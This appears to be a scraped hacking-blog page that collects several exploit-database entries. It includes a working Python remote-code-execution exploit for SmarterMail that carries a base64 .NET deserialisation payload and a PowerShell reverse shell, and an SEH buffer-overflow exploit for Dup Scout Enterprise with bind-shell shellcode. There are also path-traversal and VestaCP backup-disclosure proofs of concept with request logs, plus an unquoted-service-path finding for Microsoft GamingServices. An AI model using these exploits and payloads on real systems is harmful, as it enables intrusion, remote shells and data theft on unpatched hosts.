# Exploit Title: Microsoft GamingServices 2.47.10001.0 - 'GamingServices' Unquoted Service Path
# Discovery by: Ismael Nava
# Discovery Date: 02-12-2020
# Vendor Homepage: https://www.microsoft.com
# Software Links : https://www.microsoft.com/en-us/p/xbox-beta/9mv0b5hzvk9z?activetab=pivot:overviewtab
# Tested Version: 2.47.10001.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
GamingServices GamingServices C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServices.exe Auto
GamingServicesNet GamingServicesNet C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe Auto
C:\>sc qc "GamingServicesNet"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: GamingServicesNet
TIPO : 210 WIN32_PACKAGED_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : GamingServicesNet
DEPENDENCIAS : staterepository
NOMBRE_INICIO_SERVICIO: NT AUTHORITY\LocalService
C:\>sc qc "GamingServices"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: GamingServices
TIPO : 210 WIN32_PACKAGED_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServices.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : GamingServices
DEPENDENCIAS : staterepository
NOMBRE_INICIO_SERVICIO: LocalSystem
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863143167
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: SmarterMail Build 6985 - Remote Code Execution
# Exploit Author: 1F98D
# Original Author: Soroush Dalili
# Date: 10 May 2020
# Vendor Hompage: re
# CVE: CVE-2019-7214
# Tested on: Windows 10 x64
# References:
# https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/
#
# SmarterMail before build 6985 provides a .NET remoting endpoint
# which is vulnerable to a .NET deserialisation attack.
#
#!/usr/bin/python3
import base64
import socket
import sys
from struct import pack
HOST='192.168.1.1'
PORT=17001
LHOST='192.168.1.2'
LPORT=4444
psh_shell = '$client = New-Object System.Net.Sockets.TCPClient("'+LHOST+'",'+str(LPORT)+');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
psh_shell = psh_shell.encode('utf-16')[2:] # remove BOM
psh_shell = base64.b64encode(psh_shell)
psh_shell = psh_shell.ljust(1360, b' ')
payload = 'AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAPIKL2MgcG93ZXJzaGVsbC5leGUgLWVuY29kZWRDb21tYW5kIFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFgGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw=='
payload = base64.b64decode(payload)
payload = payload.replace(bytes("X"*1360, 'utf-8'), psh_shell)
uri = bytes('tcp://{}:{}/Servers'.format(HOST, str(PORT)), 'utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST,PORT))
msg = bytes()
msg += b'.NET' # Header
msg += b'\x01' # Version Major
msg += b'\x00' # Version Minor
msg += b'\x00\x00' # Operation Type
msg += b'\x00\x00' # Content Distribution
msg += pack('I', len(payload)) # Data Length
msg += b'\x04\x00' # URI Header
msg += b'\x01' # Data Type
msg += b'\x01' # Encoding - UTF8
msg += pack('I', len(uri)) # URI Length
msg += uri # URI
msg += b'\x00\x00' # Terminating Header
msg += payload # Data
s.send(msg)
s.close()
# Exploit Title: Huawei HedEx Lite 200R006C00SPC005 - Path Traversal
# Date: 2020-11-24
# Exploit Author: Vulnerability-Lab
# Vendor Homepage: https://www.huawei.com/
# Software Link: https://support.huawei.com/carrier/docview!docview?nid=SCL1000005027&path=PAN-ET/PAN-T/PAN-T-HedEx
# Version: 200R006C00SPC005
Document Title:
===============
Huawei HedEx Lite (DM) - Path Traversal Web Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2268
Release Date:
=============
2020-11-24
Vulnerability Laboratory ID (VL-ID):
====================================
2268
Common Vulnerability Scoring System:
====================================
7
Vulnerability Class:
====================
Directory- or Path-Traversal
Current Estimated Price:
========================
3.000€ - 4.000€
Product & Service Introduction:
===============================
https://support.huawei.com/carrier/docview!docview?nid=SCL1000005027&path=PAN-ET/PAN-T/PAN-T-HedEx
Abstract Advisory Information:
==============================
A vulnerability laboratory core team researcher discovered a path
traversal vulnerability in the Huawei HedEx Lite v200R006C00SPC005.
Vulnerability Disclosure Timeline:
==================================
2020-11-24: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Restricted Authentication (User Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
An exploitable path traversal vulnerability has been discovered in the
official Huawei HedEx Lite v200R006C00SPC005.
Attackers can able to request local files or resources by remote
requesting to unauthorized change a local path.
Proof of Concept (PoC):
=======================
The path traversal vulnerability can be exploited by remote attackers
with restricted system user privileges wihtout user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Vulnerable File(s):
./newOtherManageContent.cgi [URL Path Filename]
./newStartupHedExBeeAction.cgi [URL Path Filename]
./newprehomeadvsearch.cgi [URL Path Filename]
--- PoC Session Logs [POST Method Request] ---
URL:
http://localhost:7890/newOtherManageContent.cgi/................................windowswin.ini
Path:
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
HTTP/1.1
Host: localhost:7890
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101
Firefox/27.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://localhost:7890/newindex.cgi
Connection: close
Content-Length: 0
--- PoC Session Logs [Response] ---
HTTP/1.1 200 OK
Content-Disposition: attachment; filename="win.ini"
Content-Length: 1801
Content-Type: application/octet-stream;charset=utf-8
X-Frame-Options: SAMEORIGIN
-
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
CMCDLLNAME32=mapi32.dll
CMC=1
MAPIX=1
MAPIXVER=1.0.0.1
OLEMessaging=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo
[Drivers.32]
OLEMessaging.64=$80,$5D,$D9,$A6,$A4,$18,$A8,$AD
[ChannelDownmixer]
p1.bIsMultichannel=0
p1.wFormatTag=1
p1.nChannels=2
p1.dwChannelMask=63
p1.wBitsPerSample=16
p1.RequiredInputBitDepth=0
p1.bRequireInputNumberOfChannels=0
p1.RequiredInputNumberOfChannels=6
p1.bRequireInputSamplerate=0
p1.RequiredInputSamplerate=48000
p1.bRaiseMeritAndSingleInstance=1
p2.InputEnableBitmask=-1
p2.OutputEnableBitmask=-1
p2.bEnableInputGains=0
p2.bEnableOutputGains=0
p2.bEnableMasterVolume=0
p2.MasterVolumeGain=100
p2.I.FL=100
p2.I.FR=100
p2.I.FC=100
p2.I.LF=100
p2.I.BL=100
p2.I.BR=100
p2.I.FLC=100
p2.I.FRC=100
p2.I.BC=100
p2.I.SL=100
p2.I.SR=100
p2.I.TC=100
p2.I.TFL=100
p2.I.TFC=100
p2.I.TFR=100
p2.I.TBL=100
p2.I.TBC=100
p2.I.TBR=100
p2.I.bJoinFLFR=1
p2.I.bJoinBLBR=1
p2.I.bJoinFLCFRC=1
p2.I.bJoinSLSR=1
p2.I.bJoinTFLTFR=1
p2.I.bJoinTBLTBR=1
p2.O.FL=100
p2.O.FR=100
p2.O.FC=100
p2.O.LF=100
p2.O.BL=100
p2.O.BR=100
p2.O.FLC=100
p2.O.FRC=100
p2.O.BC=100
p2.O.SL=100
p2.O.SR=100
p2.O.TC=100
p2.O.TFL=100
p2.O.TFC=100
p2.O.TFR=100
p2.O.TBL=100
p2.O.TBC=100
p2.O.TBR=100
p2.O.bJoinFLFR=1
p2.O.bJoinBLBR=1
p2.O.bJoinFLCFRC=1
p2.O.bJoinSLSR=1
p2.O.bJoinTFLTFR=1
p2.O.bJoinTBLTBR=1
p3.bCustomMixMatrix=0
CustomMixMatrixFilename=
LastRegisteredVersion=20000
Solution - Fix & Patch:
=======================
The vulnerability can be resolved by setting restricted accessable
paths. A whitelist or static paths configuration can be combined.
An update is available on the huawei website provided by the
manufacturer of the application via customer portal.
Security Risk:
==============
The security risk of the path traversal web vulnerability in the
download manager software is estimated as high.
Credits & Authors:
==================
S.AbenMassaoud [Research Team] -
https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
# Exploit Title: Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)
# Date: 2020-12-08
# Exploit Author: Andrés Roldán
# Vendor Homepage: http://www.dupscout.com
# Software Link: http://www.dupscout.com/downloads.html
# Version: 10.0.18
# Tested on: Windows 10 Pro x64
#!/usr/bin/env python3
import socket
import struct
HOST = '127.0.0.1'
PORT = 80
# msfvenom --platform windows --arch x86 -p windows/shell_bind_tcp -b "\x00\0x9\x0a\x0d\x20" -f python -v SHELL
SHELL = b""
SHELL += b"\x29\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e"
SHELL += b"\x81\x76\x0e\xfa\xfa\xc4\x90\x83\xee\xfc\xe2\xf4"
SHELL += b"\x06\x12\x46\x90\xfa\xfa\xa4\x19\x1f\xcb\x04\xf4"
SHELL += b"\x71\xaa\xf4\x1b\xa8\xf6\x4f\xc2\xee\x71\xb6\xb8"
SHELL += b"\xf5\x4d\x8e\xb6\xcb\x05\x68\xac\x9b\x86\xc6\xbc"
SHELL += b"\xda\x3b\x0b\x9d\xfb\x3d\x26\x62\xa8\xad\x4f\xc2"
SHELL += b"\xea\x71\x8e\xac\x71\xb6\xd5\xe8\x19\xb2\xc5\x41"
SHELL += b"\xab\x71\x9d\xb0\xfb\x29\x4f\xd9\xe2\x19\xfe\xd9"
SHELL += b"\x71\xce\x4f\x91\x2c\xcb\x3b\x3c\x3b\x35\xc9\x91"
SHELL += b"\x3d\xc2\x24\xe5\x0c\xf9\xb9\x68\xc1\x87\xe0\xe5"
SHELL += b"\x1e\xa2\x4f\xc8\xde\xfb\x17\xf6\x71\xf6\x8f\x1b"
SHELL += b"\xa2\xe6\xc5\x43\x71\xfe\x4f\x91\x2a\x73\x80\xb4"
SHELL += b"\xde\xa1\x9f\xf1\xa3\xa0\x95\x6f\x1a\xa5\x9b\xca"
SHELL += b"\x71\xe8\x2f\x1d\xa7\x92\xf7\xa2\xfa\xfa\xac\xe7"
SHELL += b"\x89\xc8\x9b\xc4\x92\xb6\xb3\xb6\xfd\x05\x11\x28"
SHELL += b"\x6a\xfb\xc4\x90\xd3\x3e\x90\xc0\x92\xd3\x44\xfb"
SHELL += b"\xfa\x05\x11\xfa\xf2\xa3\x94\x72\x07\xba\x94\xd0"
SHELL += b"\xaa\x92\x2e\x9f\x25\x1a\x3b\x45\x6d\x92\xc6\x90"
SHELL += b"\xeb\xa6\x4d\x76\x90\xea\x92\xc7\x92\x38\x1f\xa7"
SHELL += b"\x9d\x05\x11\xc7\x92\x4d\x2d\xa8\x05\x05\x11\xc7"
SHELL += b"\x92\x8e\x28\xab\x1b\x05\x11\xc7\x6d\x92\xb1\xfe"
SHELL += b"\xb7\x9b\x3b\x45\x92\x99\xa9\xf4\xfa\x73\x27\xc7"
SHELL += b"\xad\xad\xf5\x66\x90\xe8\x9d\xc6\x18\x07\xa2\x57"
SHELL += b"\xbe\xde\xf8\x91\xfb\x77\x80\xb4\xea\x3c\xc4\xd4"
SHELL += b"\xae\xaa\x92\xc6\xac\xbc\x92\xde\xac\xac\x97\xc6"
SHELL += b"\x92\x83\x08\xaf\x7c\x05\x11\x19\x1a\xb4\x92\xd6"
SHELL += b"\x05\xca\xac\x98\x7d\xe7\xa4\x6f\x2f\x41\x34\x25"
SHELL += b"\x58\xac\xac\x36\x6f\x47\x59\x6f\x2f\xc6\xc2\xec"
SHELL += b"\xf0\x7a\x3f\x70\x8f\xff\x7f\xd7\xe9\x88\xab\xfa"
SHELL += b"\xfa\xa9\x3b\x45"
PAYLOAD = (
b'\x90' * (2482 - len(SHELL)) +
SHELL +
b'\xeb\x10\x90\x90' +
# 0x1002071c: add esp,8 # ret 0x04 at libspp.dll (ASLR: False, Rebase: False, SafeSEH: False)
struct.pack('<L', 0x1002071c) +
b'\x90' * 32 +
b'\xE9\x4D\xF6\xFF\xFF' +
b'C' * (10000 - 2482 - 4 - 32 - len(SHELL))
)
HTTP_PAYLOAD = (
b'GET /settings&sid=' + PAYLOAD + b' HTTP/1.1\r\n' +
b'Host: ' + HOST.encode() +
b'\r\n\r\n'
)
with socket.create_connection((HOST, PORT)) as fd:
print('[+] Sending payload...')
fd.sendall(HTTP_PAYLOAD)
print('[+] Done. Check for a shell on port 4444.')
# Exploit Title: VestaCP 0.9.8-26 - 'backup' Information Disclosure
# Date: 2020-11-25
# Exploit Author: Vulnerability-Lab
# Vendor Homepage: https://vestacp.com/
# Software Link: https://vestacp.com/install/
# Version: 0.9.8-26
Document Title:
===============
VestaCP v0.9.8-26 - Insufficient Session Validation Web Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2238
Release Date:
=============
2020-11-25
Vulnerability Laboratory ID (VL-ID):
====================================
2238
Common Vulnerability Scoring System:
====================================
7
Vulnerability Class:
====================
Insufficient Session Validation
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Web interface is open source php and javascript interface based on Vesta
open API, it uses 381 vesta CLI calls.
The GNU General Public Licence is a free, copyleft licence for software
and other kinds of works. Its free to change,
modify and redistribute source code.
(Copy of the Homepage: https://vestacp.com/features/ &
https://vestacp.com/install/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a
insufficient session validation vulnerability in the VestaCP v0.9.8-26
hosting web-application.
Affected Product(s):
====================
Vesta
Product: VestaCP v0.9.8-26 - Hosting Control Panel (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2020-05-04: Researcher Notification & Coordination (Security Researcher)
2020-05-05: Vendor Notification (Security Department)
2020-05-07: Vendor Response/Feedback (Security Department)
2020-**-**: Vendor Fix/Patch (Service Developer Team)
2020-**-**: Security Acknowledgements (Security Department)
2020-11-25: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Full Disclosure
Technical Details & Description:
================================
An insufficient session validation vulnerability has been discovered in
the official VestaCP (Control Panel) v0.9.8-26 hosting web-application.
The vulnerability allows remote attackers to gain sensitive
web-application data or information without permission, authentication
or authorization.
The backup url includes a token parameter for the download request on
backups. The mechanism is to secure that other users can only download the
backup with the token to confirm the permission. The token is not
required for the download and can be deattached in the client-side
session request.
The session validation of the backup download request is insufficient
validating the request without token parameter approval. Next to that
the backup
uses the name of the privileges in combination with the date in a tar
compressed folder. Thus allows a remote attacker with low user
privileges to
download the backup data without permission.
Successful exploitation of the session web vulnerability results in
information disclosure of the local application and dbms backup files.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] /download/backup/
Vulnerable Parameter(s):
[+] token
Affected Parameter(s):
[+] backup
Proof of Concept (PoC):
=======================
The insufficient session validation vulnerability can be exploited by
remote attackers with simple user privileges without user interaction.
For security demonstration or to reproduce the information disclosure
issue follow the provided information and steps below to continue.
Request: Default (Download Backup)
https://vestacp.localhost:8083/download/backup/?backup=user.2020-04-28_00-00-17.tar&token=d6f4a3a923ab5c60ef0a52995245a3d4
https://vestacp.localhost:8083/download/backup/?backup=admin.2020-04-28_00-00-17.tar&token=d6f4a3a923ab5c60ef0a52995245a3d4
PoC: Exploitation
https://vestacp.localhost:8083/download/backup/?backup=[USER/ADMIN].[YYYY-MM-DD_HH-MM-SS].tar
https://vestacp.localhost:8083/download/backup/?backup=user.2020-04-28_00-00-17.tar
https://vestacp.localhost:8083/download/backup/?backup=admin.2020-04-28_00-00-17.tar
PoC: Exploit
<html>
<head><body>
<title>VestaCP (Control Panel) v0.9.8-26 - Information Disclosure
(Backup)</title>
<iframe
src=https://vestacp.localhost:8083/download/backup/?backup=[USER/ADMIN].[YYYY-MM-DD_HH-MM-SS].tar>
</body></head>
<html>
--- PoC Session Logs [GET] ---
https://vestacp.localhost:8083/download/backup/?backup=user.2020-**-**_00-00-17.tar
Host: vestacp.localhost:8083
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=4neq25hga91vqrf4maktd4q073;
-
GET: HTTP/1.1 200 OK
Server: nginx
Content-Type: application/gzip
Content-Length: 3891200
Connection: keep-alive
Content-Disposition: attachment; filename="user.2020-**-**_00-00-17.tar";
Accept-Ranges: bytes
Reference(s):
https://vestacp.localhost:8083/
https://vestacp.localhost:8083/download/
https://vestacp.localhost:8083/download/backup/
https://vestacp.localhost:8083/download/backup/?backup
Security Risk:
==============
The security risk of the session validation web vulnerability in the
vestacp web-application is estimated as high.
